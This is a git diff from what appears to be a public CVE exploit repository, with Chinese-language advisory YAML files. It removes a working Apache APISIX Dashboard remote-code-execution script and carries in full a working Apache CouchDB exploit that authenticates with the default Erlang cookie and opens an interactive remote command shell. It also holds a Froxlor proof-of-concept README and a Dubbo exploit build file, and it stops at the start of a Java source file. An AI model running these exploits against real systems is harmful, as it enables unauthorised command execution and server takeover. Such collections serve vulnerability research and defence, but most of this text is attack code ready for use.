diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py deleted file mode 100644 index edd12c9f1d0ba6168ef5179a32a544486d7213dc..0000000000000000000000000000000000000000 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ /dev/null @@ -1,93 +0,0 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + "/" + uri) - else: - print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml index ad102017e26ecb22741a65bbfed063bfe70dcce9..3041c77691c888a6c2abd26d4808d2f3d5cf123c 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-45232 -source: https://github.com/wuppp/cve-2021-45232-exp -info: - name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 - severity: CRITICAL - description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 - scope-of-influence: - In Apache APISIX Dashboard before 2.10.1 - reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - - https://seclists.org/oss-sec/2021/q4/180 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - cnvd-id: None - kve-id: None +id: CVE-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + In Apache APISIX Dashboard before 2.10.1 + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None tags: cve2021 \ No newline at end of file diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md index d0fe71ba89cc6d5e5d30594e95341686d0f35559..cfd00af28925574386fc195d8af2713ca63929fa 100644 --- a/cve/Froxlor/2023/CVE-2023-0315/README.md +++ b/cve/Froxlor/2023/CVE-2023-0315/README.md @@ -1,28 +1,28 @@ -# CVE-2023-0315 Proof-of-Concept -### Overview -This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315. -It exploits a command injection vulnerability in Froxlor prior to version 2.0.8. -An authenticated attacker can achieve a full remote command execution on OS level under the web server user. -For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details. - -### Dependencies -* Froxlor 2.0.3 Stable -* Python 3.8+ -* `requests` Python Library -* `beautifulsoup4` Python Library -* Ubuntu 20.04 -* PHP 8.2 -### Usage - -1.Verify the required libraries are installed: -``` -pip install requests beautifulsoup4 -``` -2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance. - -3.Run the PoC: -``` -python cve-2023-0315.py -``` -### Additional Information -This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version. +# CVE-2023-0315 Proof-of-Concept +### Overview +This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315. +It exploits a command injection vulnerability in Froxlor prior to version 2.0.8. +An authenticated attacker can achieve a full remote command execution on OS level under the web server user. +For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details. + +### Dependencies +* Froxlor 2.0.3 Stable +* Python 3.8+ +* `requests` Python Library +* `beautifulsoup4` Python Library +* Ubuntu 20.04 +* PHP 8.2 +### Usage + +1.Verify the required libraries are installed: +``` +pip install requests beautifulsoup4 +``` +2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance. + +3.Run the PoC: +``` +python cve-2023-0315.py +``` +### Additional Information +This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version. diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index 5823536abbef629b12ff077f4ea608daf7ab157d..d0b9db0de60b1635c0ec91c214025ad4a0966973 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -1,21 +1,21 @@ -id: CVE-2023-0315 -source: - https://github.com/mhaskar/CVE-2023-0315 -info: - name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: high - description: | - Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 - scope-of-influence: - Froxlor 2.0.8 之前的版本 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 - - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2023-0315 - cwe-id: CWE-77 - cnvd-id: None - kve-id: None - tags: 远程代码执行, RCE +id: CVE-2023-0315 +source: + https://github.com/mhaskar/CVE-2023-0315 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: | + Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 + scope-of-influence: + Froxlor 2.0.8 之前的版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 + - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0315 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None + tags: 远程代码执行, RCE diff --git a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml index e4ffd901215e4b0b6ae8be0bc862d05aba547459..a0a833e06766cde7540ad812ecf9c475065d726e 100644 --- a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml +++ b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-21315 -source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC -info: - name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。 - severity: HIGH - description: | - Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。 - scope-of-influence: - Node.js-systeminformation<5.3.1 - reference: - - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525 - - https://security.netapp.com/advisory/ntap-20210312-0007/ - - https://www.npmjs.com/package/systeminformation - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2021-21315 - cwe-id: CWE-78 - cnvd-id: None - kve-id: None +id: CVE-2021-21315 +source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC +info: + name: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。 + severity: HIGH + description: | + Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。 + scope-of-influence: + Node.js-systeminformation<5.3.1 + reference: + - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC + - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525 + - https://security.netapp.com/advisory/ntap-20210312-0007/ + - https://www.npmjs.com/package/systeminformation + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-21315 + cwe-id: CWE-78 + cnvd-id: None + kve-id: None tags: cve2021, 系统入侵 \ No newline at end of file diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml index 11f0fd086319ad74ef1f9036891f68b337111330..497f08e0b288cc0acb7d09a48ab7fd128a7579b1 100644 --- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml @@ -1,19 +1,19 @@ -id: CVE-2023-23397 -source: https://github.com/Trackflaw/CVE-2023-23397 -info: - name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 - severity: critical - description: | - Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). - scope-of-influence: - outlook-2013, outlook-2016, outlook-2019 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-23397 - cwe-id: CWE-294 - cnvd-id: None - kve-id: None +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py index 94a6e36024cf1f1d89edbbc35e211da195c8bcbd..5b9c6d1fb71beac66e37aee92341413d4302374b 100644 --- a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py +++ b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py @@ -1,136 +1,136 @@ -# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) -# Date: 2022-01-21 -# Exploit Author: Konstantin Burov, @_sadshade -# Software Link: https://couchdb.apache.org/ -# Version: 3.2.1 and below -# Tested on: Kali 2021.2 -# Based on 1F98D's Erlang Cookie - Remote Code Execution -# Shodan: port:4369 "name couchdb at" -# CVE: CVE-2022-24706 -# References: -# https://habr.com/ru/post/661195/ -# https://www.exploit-db.com/exploits/49418 -# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ -# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce -# -# -#!/usr/local/bin/python3 - -import socket -from hashlib import md5 -import struct -import sys -import re -import time - -TARGET = "" -EPMD_PORT = 4369 # Default Erlang distributed port -COOKIE = "monster" # Default Erlang cookie for CouchDB -ERLNAG_PORT = 0 -EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list - -# Some data: -NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" -CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" -CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" -CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" - - -def compile_cmd(CMD): - MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" - MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" - MSG += struct.pack(">H", len(CMD)) - MSG += bytes(CMD, 'ascii') - MSG += b'jw\x04user' - PAYLOAD = b'\x70' + CTRL_DATA + MSG - PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD - return PAYLOAD - -print("Remote Command Execution via Erlang Distribution Protocol.\n") - -while not TARGET: - TARGET = input("Enter target host:\n> ") - -# Connect to EPMD: -try: - epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - epm_socket.connect((TARGET, EPMD_PORT)) -except socket.error as msg: - print("Couldnt connect to EPMD: %s\n terminating program" % msg) - sys.exit(1) - -epm_socket.send(EPM_NAME_CMD) #request Erlang nodes -if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK - data = epm_socket.recv(1024) - data = data[0:len(data) - 1].decode('ascii') - data = data.split("\n") - if len(data) == 1: - choise = 1 - print("Found " + data[0]) - else: - print("\nMore than one node found, choose which one to use:") - line_number = 0 - for line in data: - line_number += 1 - print(" %d) %s" %(line_number, line)) - choise = int(input("\n> ")) - - ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) -else: - print("Node list request error, exiting") - sys.exit(1) -epm_socket.close() - -# Connect to Erlang port: -try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((TARGET, ERLNAG_PORT)) -except socket.error as msg: - print("Couldnt connect to Erlang server: %s\n terminating program" % msg) - sys.exit(1) - -s.send(NAME_MSG) -s.recv(5) # Receive "ok" message -challenge = s.recv(1024) # Receive "challenge" message -challenge = struct.unpack(">I", challenge[9:13])[0] - -#print("Extracted challenge: {}".format(challenge)) - -# Add Challenge Digest -CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") - + bytes(str(challenge), "ascii")).digest() -s.send(CHALLENGE_REPLY) -CHALLENGE_RESPONSE = s.recv(1024) - -if len(CHALLENGE_RESPONSE) == 0: - print("Authentication failed, exiting") - sys.exit(1) - -print("Authentication successful") -print("Enter command:\n") - -data_size = 0 -while True: - if data_size <= 0: - CMD = input("> ") - if not CMD: - continue - elif CMD == "exit": - sys.exit(0) - s.send(compile_cmd(CMD)) - data_size = struct.unpack(">I", s.recv(4))[0] # Get data size - s.recv(45) # Control message - data_size -= 45 # Data size without control message - time.sleep(0.1) - elif data_size < 1024: - data = s.recv(data_size) - #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) - time.sleep(0.1) - print(data.decode()) - data_size = 0 - else: - data = s.recv(1024) - #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data))) - time.sleep(0.1) - print(data.decode(),end = '') +# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) +# Date: 2022-01-21 +# Exploit Author: Konstantin Burov, @_sadshade +# Software Link: https://couchdb.apache.org/ +# Version: 3.2.1 and below +# Tested on: Kali 2021.2 +# Based on 1F98D's Erlang Cookie - Remote Code Execution +# Shodan: port:4369 "name couchdb at" +# CVE: CVE-2022-24706 +# References: +# https://habr.com/ru/post/661195/ +# https://www.exploit-db.com/exploits/49418 +# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ +# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce +# +# +#!/usr/local/bin/python3 + +import socket +from hashlib import md5 +import struct +import sys +import re +import time + +TARGET = "" +EPMD_PORT = 4369 # Default Erlang distributed port +COOKIE = "monster" # Default Erlang cookie for CouchDB +ERLNAG_PORT = 0 +EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list + +# Some data: +NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" +CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" +CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" +CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" + + +def compile_cmd(CMD): + MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" + MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" + MSG += struct.pack(">H", len(CMD)) + MSG += bytes(CMD, 'ascii') + MSG += b'jw\x04user' + PAYLOAD = b'\x70' + CTRL_DATA + MSG + PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD + return PAYLOAD + +print("Remote Command Execution via Erlang Distribution Protocol.\n") + +while not TARGET: + TARGET = input("Enter target host:\n> ") + +# Connect to EPMD: +try: + epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + epm_socket.connect((TARGET, EPMD_PORT)) +except socket.error as msg: + print("Couldnt connect to EPMD: %s\n terminating program" % msg) + sys.exit(1) + +epm_socket.send(EPM_NAME_CMD) #request Erlang nodes +if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK + data = epm_socket.recv(1024) + data = data[0:len(data) - 1].decode('ascii') + data = data.split("\n") + if len(data) == 1: + choise = 1 + print("Found " + data[0]) + else: + print("\nMore than one node found, choose which one to use:") + line_number = 0 + for line in data: + line_number += 1 + print(" %d) %s" %(line_number, line)) + choise = int(input("\n> ")) + + ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) +else: + print("Node list request error, exiting") + sys.exit(1) +epm_socket.close() + +# Connect to Erlang port: +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((TARGET, ERLNAG_PORT)) +except socket.error as msg: + print("Couldnt connect to Erlang server: %s\n terminating program" % msg) + sys.exit(1) + +s.send(NAME_MSG) +s.recv(5) # Receive "ok" message +challenge = s.recv(1024) # Receive "challenge" message +challenge = struct.unpack(">I", challenge[9:13])[0] + +#print("Extracted challenge: {}".format(challenge)) + +# Add Challenge Digest +CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") + + bytes(str(challenge), "ascii")).digest() +s.send(CHALLENGE_REPLY) +CHALLENGE_RESPONSE = s.recv(1024) + +if len(CHALLENGE_RESPONSE) == 0: + print("Authentication failed, exiting") + sys.exit(1) + +print("Authentication successful") +print("Enter command:\n") + +data_size = 0 +while True: + if data_size <= 0: + CMD = input("> ") + if not CMD: + continue + elif CMD == "exit": + sys.exit(0) + s.send(compile_cmd(CMD)) + data_size = struct.unpack(">I", s.recv(4))[0] # Get data size + s.recv(45) # Control message + data_size -= 45 # Data size without control message + time.sleep(0.1) + elif data_size < 1024: + data = s.recv(data_size) + #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) + time.sleep(0.1) + print(data.decode()) + data_size = 0 + else: + data = s.recv(1024) + #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data))) + time.sleep(0.1) + print(data.decode(),end = '') data_size -= 1024 \ No newline at end of file diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md index b001885847d8d79b55361cea7bb6f4884bda32ea..73708b8f9f3bc3e28523840bc45a9af73dc86c5d 100644 --- a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md +++ b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md @@ -1,26 +1,26 @@ -# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706 -Date: 2022-01-21 - -Exploit Author: Konstantin Burov, @_sadshade - -Software Link: https://couchdb.apache.org/ - -Version: 3.2.1 and below - -Tested on: Kali 2021.2 - -Based on 1F98D's Erlang Cookie - Remote Code Execution - -Shodan: port:4369 "name couchdb at" - -CVE: CVE-2022-24706 - -References: - -https://habr.com/ru/post/661195/ - -https://www.exploit-db.com/exploits/49418 - -https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ - +# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706 +Date: 2022-01-21 + +Exploit Author: Konstantin Burov, @_sadshade + +Software Link: https://couchdb.apache.org/ + +Version: 3.2.1 and below + +Tested on: Kali 2021.2 + +Based on 1F98D's Erlang Cookie - Remote Code Execution + +Shodan: port:4369 "name couchdb at" + +CVE: CVE-2022-24706 + +References: + +https://habr.com/ru/post/661195/ + +https://www.exploit-db.com/exploits/49418 + +https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ + https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd50933b6fd9d54ff9e4a4ad5160724bc76d9b..948e103ce736a38cdd4385322a4d9dfaf439fc2b 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml @@ -1,32 +1,32 @@ -id: CVE-2022-24706 -source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit -info: - name: Apache CouchDB 是一个面向文档的数据库管理系统。 - severity: critical - description: - 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 - scope-of-influence: - apache-CouchDB < 3.2.2 - reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... - - http://www.openwall.com/lists/oss-security/2022/04/26/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/2 - - http://www.openwall.com/lists/oss-security/2022/05/09/3 - - http://www.openwall.com/lists/oss-security/2022/05/09/4 - - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... - - https://www.openwall.com/lists/oss-security/2022/04/26/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-24706 - cwe-id: CWE-1188 - cnvd-id: None - kve-id: None - tags: - - 不安全的默认资源初始化 - - 弱口令要求 +id: CVE-2022-24706 +source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit +info: + name: Apache CouchDB 是一个面向文档的数据库管理系统。 + severity: critical + description: + 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 + scope-of-influence: + apache-CouchDB < 3.2.2 + reference: + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://www.openwall.com/lists/oss-security/2022/04/26/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/2 + - http://www.openwall.com/lists/oss-security/2022/05/09/3 + - http://www.openwall.com/lists/oss-security/2022/05/09/4 + - https://docs.couchdb.org/en/3.2.2/setup/cluster.html + - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://www.openwall.com/lists/oss-security/2022/04/26/1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24706 + cwe-id: CWE-1188 + cnvd-id: None + kve-id: None + tags: + - 不安全的默认资源初始化 + - 弱口令要求 - 远程代码执行 \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml index 684c223ab072bfdd3b63b13980189c50587b0c5c..ed82fde27a0b61684b15b8135e50115dde8fda27 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml @@ -1,60 +1,60 @@ - - - 4.0.0 - - groupId - DubboProtocolExploit - 1.0-SNAPSHOT - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.8.1 - - 8 - 8 - - - - - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - com.alibaba - dubbo - 2.6.9 - - - com.alibaba - dubbo-remoting-netty4 - 2.6.9 - - - io.netty - netty-all - 4.1.60.Final - - - org.springframework - spring-web - 5.1.9.RELEASE - - - com.nqzero - permit-reflect - 0.4 - - - + + + 4.0.0 + + groupId + DubboProtocolExploit + 1.0-SNAPSHOT + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.8.1 + + 8 + 8 + + + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + com.alibaba + dubbo + 2.6.9 + + + com.alibaba + dubbo-remoting-netty4 + 2.6.9 + + + io.netty + netty-all + 4.1.60.Final + + + org.springframework + spring-web + 5.1.9.RELEASE + + + com.nqzero + permit-reflect + 0.4 + + + diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java index 0efbaf721a16a33936938d78268edc9b618955b7..b165e7b8bd3c13f14943956ebd96792eed44f16d 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java @@ -1,157 +1,157 @@ -package 